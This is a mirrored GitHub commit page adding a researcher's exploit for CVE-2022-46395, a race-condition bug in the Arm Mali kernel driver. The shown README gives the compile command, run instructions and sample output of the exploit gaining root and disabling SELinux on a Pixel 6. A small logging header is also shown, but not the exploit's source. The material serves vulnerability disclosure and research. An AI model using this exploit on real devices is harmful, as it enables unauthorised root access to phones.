Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 0b6ff51

Browse files
m-y-mom-y-mo
authored
Merge pull request #760 from github/mali_46395
Blog material
2 parents 2c4ff61 + 319b5ad commit 0b6ff51

File tree

10 files changed

+3542
-0
lines changed

10 files changed

+3542
-0
lines changed

SecurityExploits/Android/Mali/CVE_2022_46395/README.md

Lines changed: 54 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
## Exploit for CVE-2022-46395
2+
3+
The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
4+
5+
The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:
6+
7+
```
8+
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
9+
```
10+
11+
The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root.
12+
13+
```
14+
oriole:/ $ /data/local/tmp/mali_user_buf
15+
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
16+
benchmark_time 357
17+
failed after 100
18+
failed after 200
19+
failed after 300
20+
benchmark_time 343
21+
failed after 400
22+
failed after 500
23+
failed after 600
24+
benchmark_time 337
25+
failed after 700
26+
failed after 800
27+
failed after 900
28+
benchmark_time 334
29+
failed after 1000
30+
failed after 1100
31+
failed after 1200
32+
benchmark_time 363
33+
failed after 1300
34+
finished reset: 190027720 fault: 135735849 772 err 0 read 3
35+
found pgd at page 4
36+
overwrite addr : 76f6100710 710
37+
overwrite addr : 76f5f00710 710
38+
overwrite addr : 76f6100710 710
39+
overwrite addr : 76f5f00710 710
40+
overwrite addr : 76f5d00710 710
41+
overwrite addr : 76f5b00710 710
42+
overwrite addr : 76f5d00710 710
43+
overwrite addr : 76f5b00710 710
44+
overwrite addr : 76f6100fd4 fd4
45+
overwrite addr : 76f5f00fd4 fd4
46+
overwrite addr : 76f6100fd4 fd4
47+
overwrite addr : 76f5f00fd4 fd4
48+
overwrite addr : 76f5d00fd4 fd4
49+
overwrite addr : 76f5b00fd4 fd4
50+
overwrite addr : 76f5d00fd4 fd4
51+
overwrite addr : 76f5b00fd4 fd4
52+
result 50
53+
oriole:/ #
54+
```

SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
#ifndef LOG_UTILS_H
2+
#define LOG_UTILS_H
3+
4+
#ifdef SHELL
5+
#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6+
#else
7+
#include <android/log.h>
8+
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9+
#endif
10+
11+
#endif

0 commit comments

Comments
 (0)